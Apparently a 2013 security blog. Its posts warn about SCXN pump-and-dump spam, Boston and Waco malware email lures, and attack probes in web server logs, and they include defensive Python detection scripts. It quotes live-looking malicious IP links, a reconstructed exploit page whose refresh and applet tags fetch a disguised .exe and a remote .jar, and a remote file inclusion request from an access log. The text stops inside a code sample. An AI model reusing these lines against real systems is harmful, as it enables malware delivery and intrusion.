April 28, 2013

SCXN pump and dump scam fails again, as predicted

One week ago I wrote about a penny stock email scam pumping up the share price of a little-known company called Scout Explorations, ticker symbol SCXN. I predicted that this pump and dump would end the way almost all such schemes do, and it did. All of the gains have been wiped out and the price has dropped back to where it was last Monday, at the open of trading.

Last Monday, when the scam was very fresh, a lot of people bought shares, driving the price up to 41 cents. It held there for about two days, then began to drop as the early buyers cashed out, again as I predicted they would. At the close of trading on April 26, this pink-sheet penny stock was selling for just 28 cents, after dropping all the way to 25 cents. People who bought into the scam at Monday morning's open roughly made their money back if they sold on Friday. All the rest lost money, except for one group.

The one group who undoubtedly gained money were the ones who bought thousands of shares of SCXN stock while it was at 5 to 15 cents, which it was for many months. The value only began to go up as a result of an offshore email spam run, coming from computers in Belarus. These folks would have earned themselves about 25 to 35 cents a share profit, as they sold (dumped) all of their stock on Tuesday, April 23. You can follow the hourly, daily, weekly, monthly or yearly activity of this penny stock on this Fox Business News page.

What amazed me the most, while following this pump and dump scam, was that the only news about the company Scout Explorations (SCXN) was contained not in actual corporate news releases, but in spam email from Belarus. I searched their website but found nothing recent to account for a sudden run on their penny stock. What I did learn is that they are hurting financially and need to come up with a huge amount of money by June. Otherwise, their honey deal with an oil spill cleanup technology company will fall through.

My guess is that part of the reason for the spam run for SCXN was to try to raise money for the company. But, there were a lot of shares in the hands of penny stock traders and they may be the only ones to capitalize on the pump and dump of April 2013.

Normally, a pump and dump lasts no more than one week. But, this one is being continued by the scammers running the email campaign. All of this weekend, my anti-spam program, MailWasher Pro, has been deleting pompous messages from Belarus touting this stock. The language used has deteriorated over the last few days. Gone is the professionally written copy that generated the early interest which pumped the value up to 41 cents on Monday and 40 cents on Tuesday. Now, the messages are strangely worded, with very poor grammar, like one would expect from people who do not speak English as their primary language.

This suggests that the ball has been passed from the initial company that was hired to begin the pump and dump, to lesser affiliates in the former Soviet Union. You vant it proof? Here is it, your proof!


Subject: New Play Coming TONIGHT!

Why Pemex could approve in SC_X_N? Exxon captures $12 Billion following
Arkansas Oil Spill. Green would execute SC_X_N technology. Lawmakers to
remove the todays restrictions vs great Oil. As traders we shall profit as
Big Oil, while reducing tomorrows mishaps. Participate massive Oil kept
obligated by participating SC_X_N on Monday Apr 29, 2013!!!

Want to read more garbage? Look at this crap!


Subject: Book Your PROFITS now!

Why Esso must buy in S CXN? Exon nets $13 Billion due Arkansas Oil Spill.
Green Peace would implement S CXN tool. Government to remove the existing
limits against large Oil. As buyers we could benefit from Large Oil,
alongside decrease future catastrophe. Assist great Oil kept accountable
by acquiring S CXN on Apr, 29th!!!


When you receive one or more of these email scams for SCXN, search the company's website, or a real business news website, for any evidence of an actual press release from the company or its representatives. The scammers running the pump and dump are inventing news about this company in an effort to make more profit at your expense. Nothing they write in the email blasts is true. The dollar figures attached to the cost of cleaning up oil spills keep changing, and the company names they drop change faster than a baby goes through diapers. I looked on the Greenpeace website for anything about them considering the SCXN "tool" and found absolutely NOTHING!

If the company does actually manage to legally acquire the oil spill cleanup system they are going for, you will read and hear about it in major business news reports, on legitimate news stations and web sites, not in spam email blasts from Belarus or other places in the former Soviet Union.

It's none of my business if you wish to play the penny stock OTC markets. I am only trying to steer you away from an obvious scam that was designed with the purpose of pumping up the value of SCXN, only to dump the shares to the detriment of the recent investors. I am writing these articles because I am receiving dozens of spam email messages about SCXN myself and this is my way of fighting back against spammers and scammers.

April 21, 2013

Pump and Dump Stock Scam of the Weekend: SCXN

Since Friday, April 19, 2013, I have received over two dozen email spam messages touting a penny stock with the ticker symbol SCXN. The purpose of these emails is to pump up interest in this stock and get as many new investors as possible to buy into it on Monday, before it crashes.

Once a predetermined price has been reached, the people already holding the majority of the shares, who also created this scheme, will cash out (dump), leaving all of the other later investors holding stock worth much less than they paid for it.

In order to try to fool spam filters, the authors add an underscore between varying letters in the symbol of the stock being spammed. So, instead of seeing the full abbreviation: SCXN, you would see S_CXN, or SC_XN, or SCX_N. No legitimate email message from a real adviser would need to try to trick spam filters in this manner.
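
The underscore trick is easy to undo mechanically, which is exactly what a content filter should do. The Python below is an added example written for this page, not a filter from the post or from MailWasher Pro: it matches a watched ticker while allowing separator characters between its letters, counts plain versus obfuscated mentions, and also catches any run of capitals broken by underscores so that a symbol nobody has put on a watch list yet is still noticed. The two sample bodies are the spam samples quoted in the April 28 post earlier on this page; the legitimate sentence and the one-entry watch list are constructed for the test.

```python
import re

# Ticker symbol the April 2013 run is pushing. A real filter would carry a
# list of currently spammed symbols; this one-entry set is an assumption.
WATCHED_TICKERS = {"SCXN"}

# Characters spammers wedge between the letters of a symbol to defeat exact
# string matching: underscores (S_CXN, SC_XN, SCX_N), spaces, dots, hyphens.
SEPARATORS = r"[\s_.\-]"

# Spam bodies quoted in the April 28 post (underscore and space variants).
SAMPLE_UNDERSCORED = """Subject: New Play Coming TONIGHT!
Why Pemex could approve in SC_X_N? Exxon captures $12 Billion following
Arkansas Oil Spill. Green would execute SC_X_N technology. Lawmakers to
remove the todays restrictions vs great Oil. As traders we shall profit as
Big Oil, while reducing tomorrows mishaps. Participate massive Oil kept
obligated by participating SC_X_N on Monday Apr 29, 2013!!!"""

SAMPLE_SPACED = """Subject: Book Your PROFITS now!
Why Esso must buy in S CXN? Exon nets $13 Billion due Arkansas Oil Spill.
Green Peace would implement S CXN tool. Government to remove the existing
limits against large Oil. As buyers we could benefit from Large Oil,
alongside decrease future catastrophe. Assist great Oil kept accountable
by acquiring S CXN on Apr, 29th!!!"""

# Constructed legitimate sentence: the symbol is written plainly.
LEGIT_TEXT = "Scout Explorations (SCXN) has not issued a press release this week."

def ticker_pattern(ticker, max_gap=2):
    """Compile a pattern matching `ticker` with up to `max_gap` separator
    characters between each pair of letters. The lookarounds keep it from
    firing on the tail of a longer word; matching is case-sensitive because
    the spam always writes symbols in capitals."""
    gap = SEPARATORS + "{0,%d}" % max_gap
    body = gap.join(re.escape(ch) for ch in ticker.upper())
    return re.compile(r"(?<![A-Za-z])" + body + r"(?![A-Za-z])")

def ticker_mentions(text, tickers=WATCHED_TICKERS):
    """Count plain and obfuscated mentions of each watched ticker."""
    counts = {}
    for ticker in tickers:
        plain = obfuscated = 0
        for m in ticker_pattern(ticker).finditer(text):
            if m.group(0) == ticker.upper():
                plain += 1
            else:
                obfuscated += 1
        counts[ticker] = {"plain": plain, "obfuscated": obfuscated}
    return counts

# Generic form: capitals broken by underscores (SC_X_N, S_CXN, SCX_N).
UNDERSCORED_SYMBOL = re.compile(r"(?<![A-Za-z_])[A-Z]{1,4}(?:_[A-Z]{1,4})+(?![A-Za-z_])")

def underscored_symbols(text):
    """De-obfuscated 3- to 5-letter symbols found by the generic pattern.
    This is a heuristic (a constant like MY_ID would also match), so treat
    a hit as a score, not a verdict, when no watched ticker is involved."""
    found = set()
    for m in UNDERSCORED_SYMBOL.finditer(text):
        symbol = m.group(0).replace("_", "")
        if 3 <= len(symbol) <= 5:
            found.add(symbol)
    return found

def is_pump_spam(text, tickers=WATCHED_TICKERS):
    """Flag a message when a watched ticker appears in obfuscated form, or
    when the generic underscore pattern finds any symbol at all."""
    counts = ticker_mentions(text, tickers)
    if any(c["obfuscated"] for c in counts.values()):
        return True
    return bool(underscored_symbols(text))
```

The space-separated variant ("S CXN") slips past the underscore-only generic rule but is still caught by the watch-list match, which is why a filter wants both: the generic rule for symbols it has never seen, the watch list for the run currently under way.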

Pump and dump scams have been around for many years and used to be run through newspaper and direct mail advertisements. But with the popularity of the Internet and the availability of cheap spam email services based in Belarus, Kazakhstan, Ukraine, Russia, Bulgaria and Latvia (to name but a few), these schemes can be sent to tens of millions of potential dupes for a few hundred dollars.

If you have multiple email accounts and they are already on spam databases, you will receive similar spam messages in each account. Or, if you have just one email account, you will certainly see multiple versions of the current pump and dump promotion on the same weekend. The spammers send multiple messages to the same or related accounts in order to drum up as much illicit profit as possible, in the shortest time. This is because the spam runs usually happen on the weekend, while the stock exchanges are closed. When trading opens on Monday morning, the people who got tricked into investing into the stock scam of the weekend will pour money into penny stocks.

Volume is as important as price to the scammers running these schemes. High trading volume on Monday gives false confidence to some holdouts and draws them into the feeding frenzy. Once the original holders see the price reach the agreed-upon mark, they all cash out at the same time, and the price of the remaining stock drops quickly. By the close of trading, these stocks are often back to a few cents above the price at which they opened the day.

A few days later, the prices drop to lower levels as the last of the duped investors try to sell their almost worthless stocks at the current low price, or simply abandon them. These folks are the big losers, like everybody else who gets taken in by a Ponzi Scheme.

Here are some references I have found that you should read before you invest in any stock trading below $1.00 that is being promoted through any medium.

Things any potential investor should do (due diligence) include:


  1. Fully research the company and its top executives. Do they have civil judgments or criminal convictions on record?

  2. Look for signs of previous pump and dump campaigns that suddenly inflated the price of the stock before it flat-lined again.

  3. Look for real (not spammed) news releases to justify sudden inflated trading prices.

  4. Study the articles I listed above to help you to identify a scam, by the words, or phrases used in the messages.

  5. Learn to read the headers in email messages, so you can trace the location of the sender of any email message. Why would an American stock adviser be sending you email from a personal computer located in Belarus?

  6. Finally, if you are contemplating getting knowingly involved in a pump and dump stock scheme, read this article to see what one outcome may be for the people who perpetrated the FrogAds pump and dump stock campaigns. Note the 2nd to last paragraph, which reads: "If the lower-ranking accused scammers are found guilty, they'll face 100-year sentences. But if the ringmasters are found guilty, they could get life."


You are ultimately responsible for your own security and the security of your money and investments. Don't let greed or sudden excitement cause you to lose focus.

April 18, 2013

Boston bombing email scams morph into Waco explosion scams

In the early hours of April 17, 2013, I published an article detailing an email scam using the Boston bombings as the lure to attack computers with malware. Today, that scam has switched to referring to the fertilizer plant explosion in West, Texas (near Waco), on the evening of April 17. The links and landing pages are the same as yesterday's.

In today's email attacks, the Subjects have been changed to refer to the Waco explosion in this fashion:

Waco Explosion HD

CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas

Raw: Texas Explosion Injures Dozens

Runner captures. Marathon Explosion

The message bodies still only contain a numeric hyperlink, in plain text. The format of these links is as follows (deactivated for your safety):

h**p://95.87.6.156/news.html

All of today's links use bare four-octet IP addresses followed by "/news.html" as of this writing. But that file name has been changed to "/texas.html" in some recent messages.

As in yesterday's malware attack pages, these numeric IP links all land on a compromised computer or device in the former Soviet Union. The pages contain several large iframes with YouTube videos of the fire and sudden explosion at the fertilizer plant. And, as in the previous attacks, there is an iframe at the bottom of those pages that displays an error message such as "Error, please try again later."

What you wouldn't see in that last iframe is the Java applet being called from another compromised computer. Its markup points to a hostile .jar file, the archive format Java applets are delivered in. A .jar file is a container, much like a zip file, that the Java runtime unpacks and executes. The applet code then checks which Java version your browser is running and fires the exploit written for it. If you have Java installed and it is not the very latest patched version (the exploits in the .jar target known, already-fixed bugs), your computer or device can be taken over by this malware downloader.

What you should know

Almost all of the current exploit kits, Blackhole among them, target Java before anything else. That is because Java is installed on billions of devices worldwide, often unbeknownst to their owners. Sometimes Java gets installed when one visits a web page that uses Java applets for interactive games and presentations. It is also needed by Apache OpenOffice for its Base database component and some other functions, so many people have a Java runtime they installed once for OpenOffice and never updated. By the time such a stale runtime is noticed, exploits for it have been in the wild for months.

If you need Apache OpenOffice but don't visit web pages requiring Java, you should disable Java content in your browsers. Versions of Java released since early 2013 have a Security tab in the Java Control Panel with an "Enable Java content in the browser" checkbox; uncheck it and click Apply to disable the plug-in in every browser on that computer. This removes the browser plug-in, the exploit kits' way in, while leaving Java available to desktop applications such as OpenOffice.

If you must have Java in a browser to interact with certain important web sites, or software applications that run in a browser, I recommend using a different browser for just those sites or apps and not browsing to any place else with that browser. It should not be your system default browser. That way it won't automatically open when you click on a link in say a .pdf file someone sends to you, or from a poisoned link in an email scam.

After setting up one browser to use a Java Plug-in, you need to manually disable Java in any remaining browsers. This is usually managed via your browser's Options, under such items as "Add-ons," or "Extensions," or "Plug-ins." Absolutely do this to your "default " browser.

Java is a powerful technology that can be used for good things, but nowadays it is more often exploited by bad guys than used on legitimate web sites. So, unless you know that you must have Java installed and take precautions to minimize your exposure to Java exploit kit attacks, I recommend uninstalling all instances of it. Windows users can find and uninstall Java through the Windows Control Panel. For Windows XP users, look for the icon labeled "Add/Remove Programs." For Windows Vista, 7 and 8, click on Programs (and Features), then "Uninstall a program." Scroll down alphabetically until you see any entry beginning with Java and uninstall each one until none remain. When the last and most recent version is gone, so will be its Control Panel icon. Now reboot your computer to flush out any Java instances that may still be loaded in a browser or in memory.

Finally, as I have said before, learn to operate your computer with less than Administrator privileges! A Limited or Standard User account on Windows is harder for an exploit kit to take over than one running with Admin rights: you have to jump through a couple of hoops to install programs that write to the operating system directories or Program Files, while Administrators can be infected without notice by cleverly coded malware routines. I have published three articles or web pages explaining how to operate with reduced user privileges and how this protects your computers: [1] [2] [3]

April 17, 2013

Malware scammers exploiting Boston bomb tragedy by email

Tonight, I discovered a new malware attack tactic in the MailWasher Pro Recycle Bin. It was automatically deleted because it matched the conditions I created in a filter I call Exploit Link. In this case, the filter was matched by a numeric IP in the URL, instead of a domain name. Numeric URLs, especially those ending with a .htm or .html file are hostile 99.999999999% of the time. This one sure was.

The email arrived very late, at about 1 AM, Eastern time. Its sender was nobody I know, but it contained this enticing subject:

Explosion at the Boston Marathon

The total content in the message body was only a link, in this (deactivated) form:

h**p://178.137.100.12/news.html     (Don't go there!)

UPDATE: April 17, 2013, at 2:55 PM EDT:

I have now discovered some new numeric links containing the file name "/boston.html" - leading to exploit pages.

This is what is known as a numeric URL or hyperlink. It does not point to any registered domain name, just to an IP address. Spammers have set up a malicious web page on some compromised computer or handheld smart device that has been assigned a static IP address (usually by its broadband Internet service provider). In this case, the IP 178.137.100.12 is assigned to a "Kyivstar" GSM mobile broadband customer in Kiev, Ukraine. That IP address is already covered by my Russian Blocklist, under the CIDR 178.137.0.0/16.

UPDATE:
All of the links I have found in these email scams are leading to computers or devices located in Russia, Bulgaria, Latvia, or The Ukraine. This is an attack hosted by criminals based in the Former Soviet Union.
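
Step 5 of the due-diligence list in the April 21 post (reading the headers to find where a message really came from), the Exploit Link filter described above (a bare numeric IP in a link) and the blocklist check can be combined into one triage routine. This Python is an added example for this page, not the author's MailWasher filter: it walks the Received chain from your own server downward to find the address that actually connected, pulls every link whose host is a bare IPv4 address out of the body, and tests both against a CIDR blocklist. The message is constructed; its Received lines, host names (.invalid names and RFC 5737 ranges) and mailbox names are invented, while the Subject, the link and the 178.137.0.0/16 range are the ones reported in this post.

```python
import ipaddress
import re
from email import message_from_string

# Constructed sample. Received lines, host names and mailboxes are invented;
# Subject, link and blocklisted range come from the April 17 post.
SAMPLE_MESSAGE = """\
Received: from mx.example.invalid ([192.0.2.10])
\tby mail.example.invalid with ESMTP id k7Z9Q1; Wed, 17 Apr 2013 01:02:11 -0400
Received: from [178.137.100.12] (unknown [178.137.100.12])
\tby mx.example.invalid with SMTP; Wed, 17 Apr 2013 01:02:09 -0400
From: "Breaking News" <news@example.invalid>
To: victim@example.invalid
Subject: Explosion at the Boston Marathon
Content-Type: text/plain; charset="us-ascii"

http://178.137.100.12/news.html
"""

# Range the post says is already on its Russian Blocklist.
BLOCKLIST = [ipaddress.ip_network("178.137.0.0/16")]

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
IPV4_RE = re.compile(r"(?<!\d)(%s)(?!\d)" % IPV4)
FROM_HOST_RE = re.compile(r"^\s*from\s+(\S+)", re.I)
NUMERIC_URL_RE = re.compile(r"https?://(%s)(?::\d+)?(/[^\s<>\"']*)?" % IPV4, re.I)

def _to_ip(text):
    try:
        return ipaddress.ip_address(text)
    except ValueError:          # 999.1.1.1, or a version number like 6.02.1.3
        return None

def originating_ip(msg, trusted_hosts=()):
    """Walk the Received chain top-down. The top line was written by your
    own server and is the only one you can trust; everything below it can
    be forged by the sender. Skip hops whose 'from' host is one of your own
    relays, then return the first public address a trusted server recorded
    as its peer: that is the machine that actually connected."""
    trusted = {h.lower() for h in trusted_hosts}
    for value in msg.get_all("Received", []):
        value = re.sub(r"\s+", " ", value)          # unfold continuation lines
        from_clause = value.split(" by ", 1)[0]
        host = FROM_HOST_RE.match(from_clause)
        if host and host.group(1).strip("[]").lower() in trusted:
            continue
        for text in IPV4_RE.findall(from_clause):
            ip = _to_ip(text)
            if ip and ip.is_global:                  # skips private/reserved hops
                return ip
    return None

def numeric_ip_urls(body):
    """(ip, path) for every link whose host is a bare IPv4 address."""
    out = []
    for m in NUMERIC_URL_RE.finditer(body):
        ip = _to_ip(m.group(1))
        if ip:
            out.append((ip, m.group(2) or "/"))
    return out

def in_blocklist(ip, blocklist=BLOCKLIST):
    return any(ip in net for net in blocklist)

def body_text(msg):
    """Concatenate every text/* part, decoded with its declared charset."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_maintype() == "text":
            raw = part.get_payload(decode=True) or b""
            chunks.append(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)

def triage(raw_message, trusted_hosts=(), blocklist=BLOCKLIST):
    """The 'Exploit Link' idea as code: a bare-IP link ending in .htm/.html,
    or any address inside the blocklist, sends the message to quarantine."""
    msg = message_from_string(raw_message)
    origin = originating_ip(msg, trusted_hosts)
    urls = numeric_ip_urls(body_text(msg))
    reasons = []
    if origin is not None and in_blocklist(origin, blocklist):
        reasons.append("origin %s is blocklisted" % origin)
    for ip, path in urls:
        if path.lower().endswith((".htm", ".html")):
            reasons.append("bare-IP link to %s%s" % (ip, path))
        if in_blocklist(ip, blocklist):
            reasons.append("link host %s is blocklisted" % ip)
    return {"origin": origin, "numeric_urls": urls, "reasons": reasons,
            "verdict": "quarantine" if reasons else "pass"}
```

Pass the names of your own inbound relays as trusted_hosts; without that list the function still skips the private 192.0.2.10 hop because it is not a global address, but on a real mail path with several public relays of your own you would otherwise stop one hop too early.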

What awaits you at this numeric URL, ending in the file named: news.html?

The destination web page, news.html, contained four iframes, three of which have embedded YouTube videos of the Boston bombing scene. The fourth iframe, however, loads a hostile Java applet from a compromised web site. This applet will attempt to escape the Java "sandbox" and infect your operating system. That can only happen if you have Java installed and it is one of the vulnerable versions the applet specifically targets.

NOTE: Java was just updated on April 16, 2013. This was to fix 42 exploitable vulnerabilities! Go to www.java.com to see if you have Java installed and if so, what version. Then update to the newest version and make sure all older versions are uninstalled. Better yet and safer, uninstall all instances of Java from your computer and eliminate the number one attack vector used in all the major malware exploit kits.

But wait, there's more! What if you don't have Java installed, or it is unplugged from your browser, or if you operate with reduced user privileges?

In addition to the hostile iframe at the bottom of the page, there is also an HTML Meta Refresh after 60 seconds to begin downloading a malicious executable file, named: "boston.avi_______.exe." Those 7 connected underscores are there to move the .exe extension out of your line of focus, to make you think it is a harmless .avi movie. This all happens automatically. That downloaded file then attempts to install a backdoor into your computer and download other Trojans to it. It may cause a User Account Control box to appear, asking for permission to run that program. Some people may think it is just part of the video displays about the Boston tragedy and be tricked into allowing the installation to continue; by typing in their Administrator password, or just giving it an Okay. Do that and your machine becomes infected by the Trojan inside that fake .avi movie file that is really a .exe (executable program) file.

UPDATE:
The latest incarnation of the Boston Bombing Exploits (BBE), on 4/17/2013, in the mid-afternoon, does not contain the 60 second timeout for a forced Trojan download. All of the exploiting comes via the included Java Applet and its .jar file. However, some of the exploit pages still contain the Meta Refresh timed download.
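
The landing pages described in this post and in the April 18 follow-up above share one structure: decoy video iframes, one iframe or applet pulling a .jar from another compromised host, and a meta refresh that fetches an executable whose .exe extension is pushed out of sight by a run of underscores. The following Python is an added static scanner written for this page, not code from the posts or from any exploit kit; it reads the markup only and fetches nothing. The sample page is a constructed reconstruction: the video IDs, the 198.51.100.23 host and the x.jar name are placeholders, while news.html, the 60-second refresh and boston.avi_______.exe come from the posts.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed reconstruction of the page described in the April 17/18 posts.
# Video IDs, the 198.51.100.23 host and x.jar are placeholders.
SAMPLE_PAGE = """<html><head><title>news</title>
<meta http-equiv="refresh" content="60;url=http://95.87.6.156/boston.avi_______.exe">
</head><body>
<iframe width="640" height="390" src="http://www.youtube.com/embed/VIDEOID1"></iframe>
<iframe width="640" height="390" src="http://www.youtube.com/embed/VIDEOID2"></iframe>
<iframe width="640" height="390" src="http://www.youtube.com/embed/VIDEOID3"></iframe>
<iframe width="10" height="10" src="http://198.51.100.23/news.html"></iframe>
<applet code="x.class" archive="http://198.51.100.23/x.jar" width="1" height="1"></applet>
<div>Error, please try again later.</div>
</body></html>"""

EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "jar"}
DECOY_HOSTS = ("youtube.com", "youtu.be")

class LandingPageScanner(HTMLParser):
    """Collect the tags that matter: iframes, Java applets/objects and meta
    refreshes. The parser never follows a URL."""
    def __init__(self):
        super().__init__()
        self.iframes, self.applets, self.refreshes = [], [], []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(a.get("src", ""))
        elif tag == "applet":
            self.applets.append(a.get("archive") or a.get("code", ""))
        elif tag in ("object", "embed") and a.get("type", "").startswith("application/x-java"):
            self.applets.append(a.get("archive") or a.get("data") or a.get("src", ""))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.refreshes.append(a.get("content", ""))

def parse_refresh(content):
    """'60;url=http://x/y' -> (60, 'http://x/y'); None if malformed."""
    m = re.match(r"""^\s*(\d+)\s*;\s*url\s*=\s*['"]?([^'"\s]+)""", content, re.I)
    return (int(m.group(1)), m.group(2)) if m else None

def padded_executable(url):
    """Detect 'movie.avi_______.exe': a decoy extension, a run of underscores
    or spaces, then the real one. Returns (decoy_ext, real_ext) or None."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    m = re.match(r"^.+?\.([A-Za-z0-9]{2,4})[_ ]{2,}\.([A-Za-z0-9]{2,4})$", name)
    if m and m.group(2).lower() in EXECUTABLE_EXT:
        return (m.group(1).lower(), m.group(2).lower())
    return None

def bare_ip_host(url):
    """True when the URL's host is a literal IPv4/IPv6 address."""
    host = urlparse(url).hostname
    try:
        return host is not None and ipaddress.ip_address(host) is not None
    except ValueError:
        return False

def scan_landing_page(html):
    scanner = LandingPageScanner()
    scanner.feed(html)
    scanner.close()
    findings = []
    for content in scanner.refreshes:
        parsed = parse_refresh(content)
        if not parsed:
            continue
        delay, url = parsed
        padded = padded_executable(url)
        ext = urlparse(url).path.rsplit(".", 1)[-1].lower()
        if padded:
            findings.append(("critical", "meta refresh after %ds fetches %s: .%s disguised as .%s"
                             % (delay, url, padded[1], padded[0])))
        elif ext in EXECUTABLE_EXT:
            findings.append(("critical", "meta refresh after %ds fetches executable %s" % (delay, url)))
    for src in scanner.applets:
        findings.append(("high", "Java applet loads %s" % src))
    for src in scanner.iframes:
        if bare_ip_host(src):
            findings.append(("high", "iframe from bare-IP host %s" % src))
    decoys = sum(1 for s in scanner.iframes if (urlparse(s).hostname or "").endswith(DECOY_HOSTS))
    hostile = any(sev in ("critical", "high") for sev, _ in findings)
    if decoys and hostile:
        findings.append(("medium", "%d video iframe(s) used as decoy for the hostile content" % decoys))
    return {"verdict": "malicious" if hostile else "clean", "findings": findings,
            "decoy_iframes": decoys, "applets": scanner.applets}
```

Run it over a saved copy of a suspicious page (never over a live fetch from your desktop); a page that is nothing but embedded videos comes back clean, and the mid-afternoon variant without the timed download still scores "malicious" on the applet alone.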

I wrote this to warn others about this new and present danger to your online security. Please stay alert to the tricks used by cyber criminals who want to steal your data, identity, bank accounts, extort money from you, or use your computer as part of a spam and/or attack botnet. Emails of this nature are very dangerous. If you must watch news articles about disasters and terrorist attacks, go to CNN, or Fox, or ABC, or CBC, or the BBC, or your preferred online authentic news web site and watch them there. All legitimate news web sites have video feed sections for breaking news.

God Bless the victims of the Boston Terror attack of April 15, 2013 and their families. God Damn the cyber criminals who exploit terrible events like this for their own unlawful benefit and our loss.

April 7, 2013

Websites attacked daily from former Soviet Union IP addresses

Every day I read my website's raw access logs, looking for things most people ignore. Of course I want to know which search engines are sending me traffic to various pages I wrote and which pages are doing the best. But, more importantly to me, I want to know who is trying to hack my website.

When I talk to others about their websites, most of them are totally absorbed in getting the most visitors (and sales or exposure), meaning they are interested in SEO. That is a good thing, if done properly, not using spammy or blackhat tactics. They also ask about my opinions on this or that easy-to-install script that is offered by their web host. These scripts include blogs, shopping carts, CMS programs, image galleries, forums and the like. All of these add-on web software programs increase the user interactions between your website and its visitors. But, they also make your website more vulnerable to hackers.

As I read my access logs I see numerous attacks targeting various commonly installed website programs and scripts. Every single day there are dozens of probes for a WordPress login screen or admin panel. Image uploaders and themes are targeted constantly. Certain popular shopping carts are frequent targets. Plus, there seems to be a non-stop attempt by spammers to post spam comments and trackbacks on any form that accepts user input.

One thing that most of the various and sundry attacks and probes have in common is where they come from (in IP space). Server hack attempts come mostly from Chinese IP addresses. WordPress login attempts and blog spam POSTS come mostly from Russian and Ukrainian IP addresses. Some spammers use a compromised computer or server in a different country as a relay.

Here are some recent raw access log entries exposing a source in the former Soviet Union (also Turkey):

46.119.119.60 (Ukraine) - - [07/Apr/2013:09:25:55 -0600]
"GET /blogs/(50 + signs)Result:+%F4%EE%F0%F3%EC+%ED%E5+%ED%E0%E9%E4%E5%ED+/
+%ED%E5+%F3%E4%E0%EB%EE%F1%FC+%EE%EF%F0%E5%E4%E5%EB%E8%F2%FC+IP HTTP/1.0"

37.57.25.225 (Ukraine) - - [07/Apr/2013:10:14:23 -0600] "GET /wp-login.php HTTP/1.0"

78.162.18.73 (Turkey) - - [07/Apr/2013:11:16:04 -0600]
"GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403

193.239.74.126 (Ukraine) - - [07/Apr/2013:11:51:50 -0600] "GET /wp-login.php HTTP/1.1" 404 (11 consecutive attempts!)

94.125.177.120 (Hungary) - - [31/Mar/2013:23:53:47 -0600]
"GET /blogs/technical_articles/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? HTTP/1.1" 403 333 "-" "libwww-perl/6.02"

78.184.243.200 (Turkey) - - [31/Mar/2013:22:43:50 -0600]
"POST /wp-login.php HTTP/1.1" 403 376 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0E)"

79.114.49.86 (Romania) - - [31/Mar/2013:22:14:31 -0600]
"GET /member/signup HTTP/1.1" 404

78.190.63.230 (Turkey) - - [31/Mar/2013:08:21:12 -0600]
"POST /wp-login.php HTTP/1.1" 403

(this one was relayed via a botted AT&T account) /blogs/2007/05/(42 + signs)Result:+chosen+nickname+%22bapatickmjuniora9658%22;+ReCaptcha+decoded;+%28JS%29;+
TryAntiSFS=3;+forum+connected+to+antispam-service+%28probably,+your+IP+and/or+nickname+was+BANNED+in+this+service%29;
+PM_LOGIN+mode;+no+post+sending+forms+are+found;

193.239.74.126 (Ukraine) - - [07/Apr/2013:11:51:52 -0600]
"GET /wp-login.php HTTP/1.1"

In addition to what I have listed above, there were countless log entries coming from Russian IP addresses, often with Russian user agent strings, performing what is known as referrer log spamming. This is where a spammer's website is planted in the Referer field (HTTP_REFERER) of your access log, in the hope that you publish your visitor statistics and thereby link back to it. The Russian referrer spam usually promotes dating and pornographic websites and I chose not to paste examples into this article. Watch your access logs for links to websites ending in .ru, .ua, .com.ua, .in or .su in the Referer field, sometimes followed by a user agent that includes "MRA" or "ru" in the string.
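
The probes quoted above fall into a few recognisable classes, and the same rules that recognise them can feed the blocklist. This Python is an added example for this page, not the author's Russian Blocklist or its tooling: it parses Apache combined-format lines, tags each request (WordPress login probes, the JCE image manager probe, a parameter whose value is itself a URL as in the Coppermine THEME_DIR request, a forum-spam bot's "Result:" report, and referrers from the TLDs listed above), aggregates by IP and emits single-host block rules in the two formats the blocklist uses. The log is constructed: the IPs, paths and the libwww-perl and Firefox user agents are those quoted in this post; the byte counts, the 198.51.100.77 and 203.0.113.5 hosts, the Referer values and the MRA user agent are invented. The percent-encoded Cyrillic in the first quoted entry decodes as Windows-1251 "форум не найден" ("forum not found"), which the decode helper shows.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlparse

# Constructed Apache combined-format sample built from the entries quoted in
# the post. Byte counts, the two RFC 5737 hosts, the Referer values and the
# MRA user agent are invented.
SAMPLE_LOG = r"""
37.57.25.225 - - [07/Apr/2013:10:14:23 -0600] "GET /wp-login.php HTTP/1.0" 404 512 "-" "-"
193.239.74.126 - - [07/Apr/2013:11:51:50 -0600] "GET /wp-login.php HTTP/1.1" 404 512 "-" "-"
193.239.74.126 - - [07/Apr/2013:11:51:52 -0600] "GET /wp-login.php HTTP/1.1" 404 512 "-" "-"
78.162.18.73 - - [07/Apr/2013:11:16:04 -0600] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 333 "-" "-"
94.125.177.120 - - [31/Mar/2013:23:53:47 -0600] "GET /blogs/technical_articles/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? HTTP/1.1" 403 333 "-" "libwww-perl/6.02"
78.184.243.200 - - [31/Mar/2013:22:43:50 -0600] "POST /wp-login.php HTTP/1.1" 403 376 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10"
46.119.119.60 - - [07/Apr/2013:09:25:55 -0600] "GET /blogs/++++++++++Result:+%F4%EE%F0%F3%EC+%ED%E5+%ED%E0%E9%E4%E5%ED HTTP/1.0" 404 512 "-" "-"
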